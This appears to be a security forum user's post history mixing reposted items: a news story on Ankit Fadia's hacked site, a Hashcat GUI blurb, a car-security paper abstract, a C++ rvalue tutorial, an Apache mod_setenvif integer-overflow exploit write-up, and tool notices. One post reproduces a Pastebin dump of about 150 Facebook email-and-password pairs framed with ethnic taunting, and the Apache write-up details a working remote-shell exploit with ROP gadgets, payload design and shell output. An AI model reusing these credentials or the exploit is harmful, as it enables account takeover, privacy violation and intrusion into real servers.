Everything posted by Nytro
-
Self Claimed Hacker - Ankit Fadia Hacked by Young Hackers Again and Again!

A self-proclaimed Indian hacker, Ankit Fadia, became a favorite target of young Indian hackers in the first week of 2012. In the last week, Mr. Fadia got hacked two to three times by different young Indian hackers. Last week members of Teamgreyhat managed to breach the website of Mr. Fadia, and today another hacker, "Himanshu Sharma" with the code name "??¢???", hacked the same server on which Ankit's website was hosted. In this attack these hackers successfully hacked into Ankit Fadia's official site and exposed lots of credentials including sensitive data, student details, database credentials (DB name, user name & password) and many more. Not only was Ankit's website hacked, 2508 other sites hosted on the same server also got hacked and their databases were also dumped by these young hackers.

Ankit Fadia offers Ankit Fadia Certified Ethical Hacker (AFCEH) certificates to those who take his courses on ethical hacking, where he gives lectures on security tools, techniques and methods. Mr. Fadia also appears on national TV at MTV on a techie show called "What The Hack". Most of the time he claims that he will give a reward to anyone who can hack him (maybe in order to promote himself as the most secure hacker). Well, there are hundreds of hackers who hacked Ankit Fadia after this award was announced! So, will Mr. Ankit give these guys a reward, or will he take legal action against them?

Last year Mr. Ankit was also hacked by Indian and Pakistani hackers multiple times using various methods. After being hacked then, why has Mr. Fadia not fixed all vulnerabilities? Is he not aware of all hacking methods? Or maybe he is not able to fix his own website? These questions are being asked by various AFCEH students, who got their certification in hacking from Mr. Fadia.

Mr. Himanshu Sharma, at the age of 17, has revealed vulnerabilities for many Fortune 500 companies. He has been listed in the "Hall of Fame" for companies like Google, Microsoft, Facebook, Apple, Samsung, India TV, IIT Bombay, Rediff, Mediafire, Dreamtemplate, TemplateMonster, Channel [V], Pizza Hut, KFC, BBC, Sony, and universities like Stanford University, Virginia University and more.

Why aren't these young hackers getting any chance to grow? Why are they not getting a chance to present their talent? Why aren't they able to help the nation by working in security? Most obviously, these young hackers have much more talent than any other self-claimed hackers. Moreover, Himanshu and all these hackers want to challenge Mr. Fadia on national TV. Well, we know that it's a big demand by kids, but they have the guts to prove themselves. We have another interesting article on Pastebin that contains reasonable truth about all his claims. Read here and here and justify this for yourself.

Source: Self Claimed Hacker - Ankit Fadia Hacked by Young Hackers Again and Again ! | The Hacker News (THN)
-
Hashcat - GUI

[h=3]Additional requirements:[/h]
Windows users require the Microsoft Visual C++ redistributable package.

[h=2]Features[/h]
- Supports all platforms used by hashcat (CPU, OpenCL, CUDA)
- Supports all hashcat implementations (hashcat, oclHashcat-plus, oclHashcat-lite)
- Free
- Multi-OS (Linux & Windows native binaries)
- Multi-Platform (32-bit & 64-bit)
- ... and much more

[h=2]Hashcat-GUI Screenshot Windows[/h]
[h=2]Hashcat-GUI Screenshot Linux[/h]

[h=2]Tested OS[/h]
All Windows and Linux versions should work on both 32 and 64 bit.

Download: http://hashcat.net/files/download.php?proj=hashcat-gui

Source: hashcat-gui - advanced password recovery
-
Comprehensive Experimental Analyses of Automotive Attack Surfaces

Stephen Checkoway, Damon McCoy, Brian Kantor, Danny Anderson, Hovav Shacham, and Stefan Savage (University of California, San Diego)
Karl Koscher, Alexei Czeskis, Franziska Roesner, and Tadayoshi Kohno (University of Washington)

Abstract

Modern automobiles are pervasively computerized, and hence potentially vulnerable to attack. However, while previous research has shown that the internal networks within some modern cars are insecure, the associated threat model—requiring prior physical access—has justifiably been viewed as unrealistic. Thus, it remains an open question if automobiles can also be susceptible to remote compromise. Our work seeks to put this question to rest by systematically analyzing the external attack surface of a modern automobile. We discover that remote exploitation is feasible via a broad range of attack vectors (including mechanics tools, CD players, Bluetooth and cellular radio), and further, that wireless communications channels allow long distance vehicle control, location tracking, in-cabin audio exfiltration and theft. Finally, we discuss the structural characteristics of the automotive ecosystem that give rise to such problems and highlight the practical challenges in mitigating them.

Download: http://www.autosec.org/pubs/cars-usenixsec2011.pdf
-
[h=2]C++ Rvalue References Explained[/h]
By Thomas Becker
Last updated: September 2011

[h=3]Contents[/h]
Introduction
Move Semantics
Rvalue References
Forcing Move Semantics
Is an Rvalue Reference an Rvalue?
Move Semantics and Compiler Optimizations
Perfect Forwarding: The Problem
Perfect Forwarding: The Solution
Rvalue References and Exceptions
The Case of the Implicit Move
Acknowledgments and Further Reading

[h=4]Introduction[/h]
Rvalue references are a feature of C++ that was added with the C++11 standard. Rvalue references are elusive. I have personally overheard several people with very, very big names in the C++ community say these things:

"Every time I think I have grasped rvalue references, they evade me again."
"Oh those rvalue references. I'm having a real hard time wrapping my head around that."
"I dread having to teach rvalue references."

The nasty thing about rvalue references is that when you look at them, it is not at all clear what their purpose might be or what problems they might solve. Therefore, I will not jump right in and explain what rvalue references are. A better approach is to start with the problems that are to be solved, and then show how rvalue references provide the solution. That way, the definition of rvalue references will appear plausible and natural to you.

Rvalue references solve at least two problems:
- Implementing move semantics
- Perfect forwarding

If you are not familiar with these problems, do not worry. Both of them will be explained in detail below. We'll start with move semantics. But before we're ready to go, I need to remind you of what lvalues and rvalues are in C++. Giving a rigorous definition is surprisingly difficult, but the explanation below is good enough for the purpose at hand.

The original definition of lvalues and rvalues from the earliest days of C is as follows: An lvalue is an expression e that may appear on the left or on the right hand side of an assignment, whereas an rvalue is an expression that can only appear on the right hand side of an assignment. For example,

    int a = 42;
    int b = 43;

    // a and b are both l-values:
    a = b; // ok
    b = a; // ok
    a = a * b; // ok

    // a * b is an rvalue:
    int c = a * b; // ok, rvalue on right hand side of assignment
    a * b = 42; // error, rvalue on left hand side of assignment

In C++, this is still useful as a first, intuitive approach to lvalues and rvalues. However, C++ with its user-defined types has introduced some subtleties regarding modifiability and assignability that cause this definition to be incorrect. There is no need for us to go further into this. Here is an alternate definition which, although it can still be argued with, will put you in a position to tackle rvalue references: An lvalue is an expression that refers to a memory location and allows us to take the address of that memory location via the & operator. An rvalue is an expression that is not an lvalue. Examples are:

    // lvalues:
    //
    int i = 42;
    i = 43; // ok, i is an lvalue
    int* p = &i; // ok, i is an lvalue
    int& foo();
    foo() = 42; // ok, foo() is an lvalue
    int* p1 = &foo(); // ok, foo() is an lvalue

    // rvalues:
    //
    int foobar();
    int j = 0;
    j = foobar(); // ok, foobar() is an rvalue
    int* p2 = &foobar(); // error, cannot take the address of an rvalue
    j = 42; // ok, 42 is an rvalue

If you are interested in a rigorous definition of rvalues and lvalues, a good place to start is Mikael Kilpeläinen's ACCU article on the subject.

Source: C++ Rvalue References Explained
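To make the lvalue/rvalue distinction above concrete, and to preview the move semantics the article goes on to cover, here is an added example that is not Thomas Becker's code. Two `classify` overloads let the compiler report which value category it sees for each expression (including the "named rvalue reference is an lvalue" case from the contents list), and a hypothetical `Buffer` type contrasts its copy constructor with a move constructor that transfers ownership. All names in the block are assumptions of this example.

```cpp
#include <algorithm>
#include <cstddef>
#include <iostream>
#include <string>
#include <utility>

// Two overloads that differ only in the value category they accept, used to
// observe which one overload resolution picks for a given expression.
const char* classify(const std::string&) { return "lvalue"; }
const char* classify(std::string&&)      { return "rvalue"; }

std::string classify_named_variable() {
    std::string s = "abc";
    return classify(s);                  // s has a name and an address: lvalue
}
std::string classify_temporary() {
    return classify(std::string("abc")); // unnamed temporary: rvalue
}
std::string classify_moved() {
    std::string s = "abc";
    return classify(std::move(s));       // std::move casts the lvalue to an rvalue
}
std::string classify_named_rvalue_reference() {
    std::string&& r = std::string("abc");
    return classify(r);                  // r itself is named, so it is an lvalue
}

// Hypothetical buffer that owns a heap array. Copying duplicates the array;
// moving steals the pointer and leaves the source empty.
struct Buffer {
    char* data;
    std::size_t len;
    explicit Buffer(std::size_t n) : data(new char[n]), len(n) {
        std::fill(data, data + n, 'x');
    }
    Buffer(const Buffer& o) : data(new char[o.len]), len(o.len) {
        std::copy(o.data, o.data + o.len, data);          // O(n) copy
    }
    Buffer(Buffer&& o) noexcept : data(o.data), len(o.len) {
        o.data = nullptr;                                  // O(1) transfer
        o.len = 0;
    }
    ~Buffer() { delete[] data; }
    Buffer& operator=(const Buffer&) = delete;             // kept out to stay short
    Buffer& operator=(Buffer&&) = delete;
};

// Returns {source length, destination length} after constructing dst from src.
std::pair<std::size_t, std::size_t> copy_buffer(std::size_t n) {
    Buffer src(n);
    Buffer dst(src);                     // src is an lvalue: copy constructor
    return {src.len, dst.len};           // both own n bytes
}
std::pair<std::size_t, std::size_t> move_buffer(std::size_t n) {
    Buffer src(n);
    Buffer dst(std::move(src));          // rvalue: move constructor runs
    return {src.len, dst.len};           // src is now empty, dst owns n bytes
}

int main() {
    std::cout << "named variable:          " << classify_named_variable() << '\n'
              << "temporary:               " << classify_temporary() << '\n'
              << "std::move(named):        " << classify_moved() << '\n'
              << "named rvalue reference:  " << classify_named_rvalue_reference() << '\n';
    auto c = copy_buffer(8);
    auto m = move_buffer(8);
    std::cout << "after copy: src=" << c.first << " dst=" << c.second << '\n'
              << "after move: src=" << m.first << " dst=" << m.second << '\n';
    return 0;
}
```

The last `classify` case is the one that trips people up: a variable declared as `std::string&&` is still a named object with an address, so passing it on selects the lvalue overload unless it is explicitly cast again with `std::move` (or forwarded).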
-
Fresh arab Facebook user's + password's By: Inject | Jan 14th, 2012 Hello, I am an Israeli hacker, and I intend to publish a list of Facebook users and passwords of Arabs To show that we are The Israelis can do more than the Arab peoples. I have lists of many site's. When this war starts i will publish all of my lists. ______________________________________________________________________________________________ Facebook users and passwords saleem.shazad@yahoo.com - 123456789 aslamparwez@yahoo.com - d3bviwmp asmalik_architect@yahoo.com - asdqwe dr.tension@hotmail.com - byb926qc1 forchiniot123@yahoo.com - begoodyou gallent_120@yahoo.com - jahangir ghazanfarsher1@gmail.com - pakistan haseeb.ahmed.siddiqui@gmail.com - mintoamber imran4t88@gmail.com - 20031989 jvdhdr@yahoo.com - 412667895 kamran_rafiq80@hotmail.com - ptjn01 khan_75120@yahoo.com - musakhan kiani.1212@yahoo.com - nomi225888 Leo8826@gmail.com - realking librawah@yahoo.com - hotlove LOVE2U4NOTHING@GMAIL.COM - KHAN0786 lucky4u_762@yahoo.com - godooo lyca205@yahoo.com - jihadi maya_kanwal1@yahoo.com - aassdd mazharhussain34@gmail.com - mmzhr439712 md_shahzaib@yahoo.com - 6663819 medstu2005-2010@hotmail.com - panaxgensing mehdihassan_zaidi@yahoo.com - s4u03002118090 mehmood@enaan.com - karachik mehmoodahmd@gmail.com - mobilink mian0321@yahoo.com - 2637997 michael.jhonson@ymail.com - 5021368 mirshazadumer@gmail.com - muzafer.283 mkhitran99@yahoo.com - nabeel99\ mks_attari92@hotmail.com - 6692201 mmuraadkhan@yahoo.com - 6473509 mohdraza1@hotmail.com - haqhoo mohsin61115@yahoo.com - 7151386 momink@hotmail.com - mr431718 montaz42@yahoo.com - 871957 moon_afridi@yahoo.com - 123456 mrasifgold@gmail.com - asif1234 MrizwanT20@yahoo.com - Mtankdik ms-zindgee2707@yahoo.com - 270707 msabir279@hotmail.com - experts msameer85@hotmail.com - reemas123 msrhmankhan@hotmail.com - 55667788 mubasherkaleem@ymail.com - 786555687 mudasar.ali98@yahoo.com - doctor98 muhammad.abdulraouf@yahoo.com - 3334952302 
muhammadfaizan30@hotmail.com - 79727972 Muhammad_Bilal26@yahoo.com - 123456 mujtabaccs@hotmail.com - pakistan mumtazjournalist@gmail.com - 03215473472 mumtazzaidi@live.com - assa32 muneebk4@gmail.com - makl04041967 Muzammil63@hotmail.Com - 4322450 my_deep_heart001@yahoo.com - aassdd m_iimran@hotmail.com - 1366998136 m_khalid21@yahoo.com - mk2002 nadeem_lhr4u@yahoo.com - 412967123 Naeemrai@rocketmail.Com - 6228849 naeemuddin31@gmail.com - 0216330663 naima.khan237@yahoo.com - ptclptcl nanoo_ji@yahoo.com - wasimahmad nasirattari786@hotmail.com - 123786 nasirnnt2005@hotmail.com - 5496568 nawazmalhi@yahoo.com - malhiji nidamardan@yahoo.com - sakhan nisargullali@yahoo.com - 111111 nooreesultan@ymail.com - 337.?s pakindia00@yahoo.com - 786786 phoolnawaz@yahoo.com - pakistan pioneer5844462@hotmail.com - windycity prince_sunny143@hotmail.com - malik1980 printo_doon@hotmail.com - pakistani qadir_sky1@yahoo.com - aassdd rabeetsh@yahoo.com - 582022 raja_sahil50@yahoo.com - 3630663 ramzan_4646@in.com - 4646045 ranajoni253@yahoo.com - 661507 RASHIDMALIK420@YAHOO.COM - JANG123 ratifimran@yahoo.com - bhaijani rehmat_wadaykhel@yahoo.com - kaleemullah rnasim73@yahoo.com - loc1334 s.fanfactory@gmail.com - 15141526 saaawan@yahoo.com - 03215123486 saazam2003@hotmail.com - mughalpura sabzawary@yahoo.com - shahzia saddabahar@yahoo.com - Sumaniloveyou sadiamajeed50@yahoo.com - lifeme sahil_haider_me@yahoo.com - ibmg74 SAIMA_KHAN42030@YAHOO.COM - 2272970 sajidahmed86@yahoo.com - aloneboy sajid_712@yahoo.com - ansari sajjalnoor@yahoo.com - abcdef saleem.shazad@yahoo.com - 123456789 salman_08_khan@yahoo.com - dharam samycool10@hotmail.com - jivepakistan sardarharis98@yahoo.com - 123456789 sarfraz_444@yahoo.com - 268097 sarmadlighari@yahoo.com - samsung SBAA@YAHOO.COM. 
- MISBAH SBAA@YAHOO.COM - misbah shadsial786@yahoo.com - 7372699 shafiq_dadly@yahoo.com - pakistan shafeeqars@yahoo.com - naseem shaheenakhtar91@yahoo.com - 7762282 shahid6501@gmail.com - humtum shahid849@hotmail.com - spa1969 shahidhameed20@yahoo.com - 967450 s_khan_123@yahoo.com - 6730143 tahirullahkhan@gmail.com - xkuzmpls tahir_sahil2006@yahoo.com - lahore1983 tahrieemb@yahoo.com - 03004589743 tamojananis@hotmail.com - 860086 tania_bano123@yahoo.com - 898989 tanveersajid23@yahoo.com - 5635044 tanzilmunir@yahoo.com - azao0102 tariqaftab.ptcl@hotmail.com - 08550855 tariqshahzad_124@yahoo.com - 123456 tariq_jamalli@yahoo.com - jamali65 terminator_bug2005@yahoo.com - bal12266 Theifof_heart@yahoo.com - 7737177 tippu_656@yahoo.com - Lahore7284507 toobi_a@yahoo.com - nafram tsn_345@yahoo.com - bindas treen24@yahoo.com - 841365 Uetian.78@gmail.Com - adgjmp ul13@ymail.com - izharlovedjhero umar_eagle@yahoo.com - attitude47 usama137@gmail.com - 03346796918 waheed_malik31@yahoo.com - ghazal wajid9419@yahoo.com - 6137634 waqar702@gmail.com - 786786 wasimabbaschanna@yahoo.com - 0217722271 wasi_wasi2002@yahoo.com - 03006886087 weyalkh@gmail.com - weyalkh12 www.ch.moazzam-phambra@hotmail.com - barnala www.dilg11@yahoo.com - love2life www.mshoaibarshad@yahoo.com - spiderman www.shakeel_shehzad786@yahoo.com - 123456 yamaan@yahoo.com - muhammadyamaan YAQUB_USAMA@YAHOO.COM - 0543430741 ymahmood71@gmail.com - national yourtrulywellwisher@yahoo.com - 1234567 zafarnadvi@gmail.com - 26011976 zahimgelani@yahoo.com - computer zahoorellahi336@gmail.com - 31193366 Zainqurishi@gmail.com - 2512005 zain_ul_abedeen11@yahoo.com - 4569178 zee4zaara@yahoo.com - drrahul ZEESHANAZ@hotmail.COM - TBJJKA ZEESHANAZ@MSN.COM - TBJJKA zirva_luv_4u@yahoo.com - 786786786 Sursa: Fresh arab Facebook user's + password's - Pastebin.com
-
Apache Mod SetEnvIf IntegerOverflow - DemoExploit

Starting Point

During routine testing, an integer overflow in apache2-mpm-worker 2.2.19 mod-setenvif was found. The crash occurred when mangling request headers using a crafted .htaccess file. The broken code was ap_pregsub in server/util.c, where the buffer size of a new header field could overflow; the value was then used for memory allocation. When copying data to the buffer, an overwrite of the apr (Apache Portable Runtime) memory-pool boundaries occurred, similar to standard heap buffer overflows.

Outline of Exploit

The main goals when creating the exploit were:
- The exploit has to be triggerable via HTTP GET requests only.
- Exploit data has to be 0-byte free to be a valid HTTP request.
- No alternative way of heap spraying is used, e.g. GET + Content-Length. All variants I knew of had much too low efficiency.
- Use libc for ROP, although all libc addresses start with a 0-byte, which cannot be sent via HTTP.
- Rely only on a libc address guess, not on a heap/stack address guess, unless the guess could be made nearly 100% reliable.
- Use the already open HTTP connections and turn them into command connections on the fly.
- Have the exploit in less than 256 bytes.

Two different exploit layouts were developed. The first one used multiple threads, so that one was overwriting the data of the second thread before hitting the end of the memory area. Precise timing was essential to get shell access. The second one used a more crafted substitution expression, stopping the copy in a single thread by modifying the regular expression currently processed in the thread. Since there is no race condition involved, this exploit was far more reliable than the first one.

First Exploitation Attempt

Due to the afore-mentioned requirements, an exploit with about 30% success rate for apache2-mpm-worker 2.2.19 on Ubuntu oneiric 32bit was developed, with the purpose of learning alternative programming techniques in a hands-on approach. To get hold of crucial apache data structures, the programs outlined here tried to exploit concurrent access to already corrupted data structures before the otherwise inevitable apache crash. Due to the additional

Step 0: Create an .htaccess file that will copy more than 4GB of data into a 16MB buffer. Usually ap_pregsub will copy data to the buffer, overwriting the whole apr-pool memory until the copy hits the upper mapped memory boundary (see the second while-loop in ap_pregsub from server/util.c). Since the .htaccess will cause ap_pregsub to fill the whole heap with repeating copies of the HTTP header block, this will also circumvent the heap randomization. The heap data will span such a large portion of the heap that a pointer to the heap will always hit one of the copies.

Step 1: To get a chance to execute code, the ap_pregsub copy process has to be stopped without SEGV. Two ways are possible:
- The copy process also overwrites the regular expression that is defining which data is currently copied. By overwriting the expression with a stop sequence ($9$9..), execution will leave the ap_pregsub function without SEGV, but will continue using the corrupted heap. Since there is no function pointer call near, most of the execution branches will lead to a crash. Just one path allows constructing an endless loop in apr_palloc.
- Terminate the overwriting process before it reaches the end using another apache thread and the already corrupted heap. Since the data copy is quite fast, the race between the two apache threads is very hard to make.
To extend the window of opportunity, an ap_pregsub stop sequence is sent first using SendTrigger-SingleThreadAprPallocEndlessLoop.c. This will add a 16MB race buffer and slow down the server by sending one thread into an endless loop; both help to extend the race window in step 3 to 100ms on an 800MHz CPU, which would also be sufficient for remote TCP exploitation.

Step 2: Send traffic that will make apache use one function pointer more frequently. For reproducibility it was important to send data that will make apache loop over just a very limited part of the whole apache binary code. Otherwise a wide variety of crashes at different code positions were observed. The RequestFlood.c program will open multiple connections to apache, send GET /AAA and then continue to send AAAA every 100ms, thus making the URL data on the server side longer in each iteration. Due to the long time between the sending of GET header bytes, it is quite likely that the heap is overwritten by the thread started in step 3 while the current thread is in apr_socket_timeout_set (srclib/apr/network_io/unix/sockopt.c). apr_socket_timeout_set also has one other advantage: it will pick up the sock pointer from the corrupted heap and write the timeout value to that location, thus giving the opportunity to write the first MSB 0-byte and use that value as a function pointer later on in ap_get_brigade from server/util_filter.c. The RequestFlood program has to be running before sending the remote shell trigger in step 3.

Step 3: Send a trigger request that will overwrite the apr heap, similar to the request from step 1, but without any stop sequence. The HTTP request data will overwrite the heap, so the threads from step 2 can pick it up. This request also contains the remote shell code, but there are a few obstacles blocking code execution:
- The stack is not overwritten at all, so standard ROP cannot work.
- The heap is overwritten with 0-byte free data, but ROP usually needs quite a few 0-bytes. This makes it impossible to use any test xxx; jz yyyy; branches or to use small positive array indices.
- The heap is not executable.
Workarounds for these problems are collected in SendTrigger-RemoteShell.c:
- No stack control: Jump to sscanf in a way so that sscanf will overwrite some values on the stack, including a return address. This is made easier since sscanf has an integer overflow when parsing the offsets for the argument skipping syntax. Hence it is possible to access values above and below the current stack position using offsets near 2^30, as seen in the scan string %1073741815$32c%3s%4hx%1x%1x%1073741815$7s. sscanf was used to add some 0-bytes on the heap also.
- No full stack control: sscanf stack editing is painful and eats up a lot of payload space. So use the return address to jump to pop esp; ret to have the stack pointing to the heap.
- Non-executable heap: Jump to mprotect and make the heap executable.
- Avoid back-connect: Loop over open file descriptors and fork a shell for every descriptor. See ForkPayload.c for the assembly code. The code uses the return address from mprotect to calculate the dup2, fork, execv addresses, thus avoiding the need for some more 0-bytes. The whole remote shell loop code is just 93 bytes.
The trigger program takes the libc start address as argument. If it is possible to place a symbolic link to /proc/self/maps on the host, simple renaming of the link will defeat the NoFollowSymlinks option and allow reading the offsets from /proc/self/maps, thus defeating the ASLR (more). If not known, the address has to be guessed using different values in SendTrigger-RemoteShell --LibcMapPos 0xxxxxx.

Step 4: To reduce the code size, the remote command connection does not return stdout. To get stdout, the first command sent to the remote should be exec 1>&0. Since SendTrigger-RemoteShell.c does not implement a nice shell GUI, one can also telnet to apache before starting step 3; the telnet connection will turn into a remote shell connection while open.

Second Exploitation Attempt

In contrast to the first attempt, this exploit overwrites the currently interpreted regex with a crafted stop sequence to terminate buffer overwriting before reaching the upper heap limit. In contrast to the first attempt, this program requires only a single apache thread to give a remote shell and could also be used to take over the process on non-mpm-worker apache servers.

Steps:

Step 0: Create an .htaccess file in /var/www that will copy more than 4GB of data into a 16MB buffer. The new variable value expression is designed in such a way that when apache is copying data to the destination buffer and overwriting the variable definition data itself, the new definition corresponds to a variable size of zero. Hence the buffer-overflowing copy process is stopped as soon as the variable definition data is overwritten.

Step 1: Mix up heap data to get a layout favorable to our tasks. This can be done by just sending a normal GET request for an existing file via a Keep-Alive connection and using that connection to send the trigger afterwards.

Step 2: The most stable server code/data flow leading to successful exploitation would be one using a function pointer near the point where the overflow began. Otherwise the exploit code will also depend on other modules loaded or platform configuration parameters (the first attempt used a function pointer after mod_setenvif processing was completed). To achieve that, apr_table_setn is used. The function usually would store the new variable value to a hash table. Since it is operating on an overwritten table data structure, it can be used to create 0-bytes at appropriate locations and finally trigger an invalid allocation. This leads apr_palloc to call an abort function, and this function pointer can be controlled. At the moment of this function call, only the function destination can be controlled; the content of all other registers cannot be used to call a suitable target function directly. Since the stack was not overwritten, standard ROP methods do not work. As a workaround, a part of the _IO_file_seekoff function can be used:

    0x00736ff7 <_IO_file_seekoff+407>: mov 0x8(%ebp),%ecx
    0x00736ffa <_IO_file_seekoff+410>: mov 0x14(%ebp),%edx
    0x00736ffd <_IO_file_seekoff+413>: mov 0x4c(%ecx),%eax
    0x00737000 <_IO_file_seekoff+416>: mov %esi,0x4(%esp)
    0x00737004 <_IO_file_seekoff+420>: mov %edx,0xc(%esp)
    0x00737008 <_IO_file_seekoff+424>: mov %edi,0x8(%esp)
    0x0073700c <_IO_file_seekoff+428>: mov %ecx,(%esp)
    0x0073700f <_IO_file_seekoff+431>: call *0x40(%eax)

At the end of the sequence the stack will contain one pointer of our choice, the value 1, and the call will go to a controllable destination. That stack layout matches the function call of __libc_dlopen_mode, the internal symbol for dlload(). A sample program to achieve this is TriggerRemoteShell.c.

Step 2: Since the attack assumed that an attacker could place an .htaccess file on the server, it is also sensible to assume that he could put a second file there as well. This second file should be a shared library loaded by the dlload call. The library contains the _init symbol; this function is called during loading of the library, hence activating the exploit code. The library itself is not very special: it just tries to identify all open socket connections using a getsockopts call and forks a shell for every connection, e.g. ExploitLib.c. When the library is loaded, the open connection of TriggerRemoteShell.c is turned into a remote shell.

Since the apache server on Ubuntu oneiric uses ASLR and the exploit needs the correct libc memory locations, the TriggerRemoteShell program can be started with the correct libc mapping information for testing. In real world examples, one might guess or try to get access to the /proc/[pid]/maps file before sending the exploit using an apache symlink time race.

    buildhost-ubuntuoneiric1110:~$ ./TriggerRemoteShell --LibcMapPos 0x6e5000
    Using libc map pos at 0x6e5000
    Opening ...
    HTTP/1.1 200 OK
    Date: Thu, 22 Dec 2011 08:56:36 GMT
    Server: Apache/2.2.20 (Ubuntu)
    Last-Modified: Sun, 20 Nov 2011 22:55:18 GMT
    ETag: "1b76-4-4b23276d097f8"
    Accept-Ranges: bytes
    Content-Length: 4
    Vary: Accept-Encoding
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/plain

    AAAA
    Linux buildhost-ubuntuoneiric1110 3.0.0-12-generic #20-Ubuntu SMP Fri Oct 7 14:50:42 UTC 2011 i686 athlon i386 GNU/Linux
    /usr/sbin/apache2 -k start: Completed: not found
    sh: turning off NDELAY mode
    ls
    bin
    boot
    dev
    ...

With a different payload library, the lower-privileged www-data process can modify the shared memory scoreboard data in a way to trigger an invalid free/gcc-lib load in the root-privileged master process, see ApacheScoreboardInvalidFreeOnShutdown.

Thinking About Security

Due to my limited programming skills, getting this first and far-from-good POC exploit was not quite easy. Some apache, libc and linux software design decisions made it simpler or easier for me:
- apache: Common use of function pointers in apache. Function pointers allow implementation of apache as a flexible, modularized web server, but simplify arbitrary code execution.
- apache: Parts of the apache code have no checks on reasonable sizes or return values, hence allowing abnormally large data structures, e.g. for heap spraying or to cause resource starvation.
- apache: apr_palloc is quite fast but uses a very simple data structure. Once one apr_memnode_t structure is under control, apr_palloc can be used to introduce 0-bytes when first_avail is incremented by a known value, which was the only other way besides apr_socket_timeout_set to add 0-bytes.
- All lib addresses start with a 0-byte: The whole POC would be much smaller if library addresses did not contain 0-bytes. This advantage is only relevant for small applications, where all libraries and modules fit into the lower 16MB.
- libc: sscanf accepts negative arg pointer offsets in the arg skipping syntax, thus allowing the use of stack addresses before and after the current stack position. What is that feature good for?
- linux: No stack-start randomization on byte granularity, allowing sscanf stack editing by modifying only the lowest byte of an address.
- linux: The mprotect syscall does not force unused protection mode flag bits to be 0, making it quite possible that during ROP a stack value has the right bits set (x executable).

Last modified 20120111
Contact e-mail: me halfdog.net

Source: Exploitation of Integer Overflow in Apache 2.2.19 mod-setenvif
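The root cause the post names, a substitution result size in ap_pregsub that wraps and is then handed to the allocator, is the part a defender most needs to recognise, so here is an added example that is neither halfdog's nor Apache's code. It models a hypothetical regex-substitution sizing routine with 32-bit arithmetic (mirroring a 32-bit build, where the wrap is reachable with large headers), once unchecked and once with the headroom check a fix needs. The template syntax, the group_len table, the 16 MB cap and the constructed inputs are assumptions of this example.

```cpp
#include <cstdint>
#include <cstdio>

// Hypothetical model of sizing a regex-substitution result (not Apache's
// ap_pregsub): every "$N" in the template expands to capture group N, whose
// length is group_len[N]; any other byte is copied verbatim.

// Unchecked sizing: the running total wraps modulo 2^32, so a result that
// needs several GB can be reported as a small allocation request, and the
// later copy then runs far past the buffer that was actually allocated.
std::uint32_t subst_size_unchecked(const char *tmpl, const std::uint32_t group_len[10]) {
    std::uint32_t total = 0;
    for (const char *p = tmpl; *p; ++p) {
        if (*p == '$' && p[1] >= '0' && p[1] <= '9') {
            total += group_len[p[1] - '0'];   // may wrap: unsigned overflow
            ++p;
        } else {
            total += 1;
        }
    }
    return total + 1;                         // trailing NUL
}

// Checked sizing: every addition is tested against the headroom left below
// `cap` (e.g. the pool's maximum node size), so the function either returns an
// exact size that fits or refuses before any allocation happens.
bool subst_size_checked(const char *tmpl, const std::uint32_t group_len[10],
                        std::uint32_t cap, std::uint32_t *out) {
    std::uint32_t total = 0;
    for (const char *p = tmpl; *p; ++p) {
        std::uint32_t add = 1;
        if (*p == '$' && p[1] >= '0' && p[1] <= '9') {
            add = group_len[p[1] - '0'];
            ++p;
        }
        if (add > cap - total) return false;  // total + add would exceed cap or wrap
        total += add;
    }
    if (total >= cap) return false;           // no room left for the NUL
    *out = total + 1;
    return true;
}

// Constructed scenario: five back-references to a 1 GiB capture group, far
// beyond the 16 MB destination the post mentions.
const std::uint32_t kCap = 16u * 1024u * 1024u;

std::uint32_t wrapped_request_size() {
    std::uint32_t group_len[10] = {0};
    group_len[1] = 0x40000000u;               // 1 GiB
    // 5 GiB + 1 wraps to 0x40000001: the allocator would be asked for ~1 GiB
    // while the copy loop still writes 5 GiB.
    return subst_size_unchecked("$1$1$1$1$1", group_len);
}

bool checked_rejects_oversize() {
    std::uint32_t group_len[10] = {0};
    group_len[1] = 0x40000000u;
    std::uint32_t n = 0;
    return !subst_size_checked("$1$1$1$1$1", group_len, kCap, &n);
}

// Sanity case: a small substitution sizes the same either way.
std::uint32_t small_request_size() {
    std::uint32_t group_len[10] = {0};
    group_len[1] = 3;
    group_len[2] = 4;
    std::uint32_t n = 0;
    subst_size_checked("$1-$2", group_len, kCap, &n);
    return n;                                 // 3 + 1 + 4 + NUL = 9
}

int main() {
    std::printf("unchecked size for a 5 GiB result: %u bytes (wrapped)\n",
                (unsigned)wrapped_request_size());
    std::printf("checked sizing rejects it: %s\n", checked_rejects_oversize() ? "yes" : "no");
    std::printf("small case: %u bytes\n", (unsigned)small_request_size());
    return 0;
}
```

The check is deliberately written as `add > cap - total` rather than `total + add > cap`: the latter performs the very addition that can wrap, so it can never detect the wrap it is meant to catch.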
-
[h=2]ShellDetect v1.0 – New Shell Code Detection Tool[/h]

About Shell Detect

Shell Detect is a FREE tool to detect the presence of shell code within a file or network stream. You can either provide a raw binary file (such as one generated by Metasploit [Reference 4]) or a network stream file as input to this tool. These days attackers distribute malicious files which contain hidden exploit shell code. On opening such files, the exploit shell code gets executed silently, leading to complete compromise of your system. This is more dangerous when the exploit is 'Zero Day', as it will not be detected by traditional signature-based anti-virus solutions. In such cases ShellDetect may help you to identify the presence of shell code (as long as it is in raw format) and help you to keep your system safe.

We recommend running this tool in a virtual environment (using VMware, VirtualBox [Reference 2,3]) as it may cause security issues on your system if the input file is malicious. Currently the ShellDetect tool is in the experimentation stage and works on Windows XP (with SP2, SP3) only.

Screenshots

Here is the screenshot of ShellDetect detecting shell code in a raw file as well as a network stream file.

Download

FREE Download ShellDetect 1.0
License: Freeware
Platform: Windows XP

Source: ShellDetect : Shell Code Detector Tool
-
WebSSO
by Mayuresh on January 15, 2012

We featured Vulture WebSSO in our List of Open Source Web Application Firewalls! It has since been updated. We now have Vulture WebSSO version 2.0.2!

Vulture is a Web-SSO solution based on reverse proxy technology, implemented on an Apache 2.2 base. Vulture WebSSO also provides application firewall functionality and interfaces between web applications and the Internet to provide unified security and authentication.

The main features are:
- Authentication of users with many supported methods: LDAP, SQL, text file, RADIUS server, digital certificates ...
- Modular design allows you to add new authentication methods
- Propagation of authentication to protected applications
- Encryption of flows
- Filtering and content rewriting
- Some features to protect against injection attacks
- Load balancing

[h=3]Download Vulture WebSSO 2.0.1:[/h]
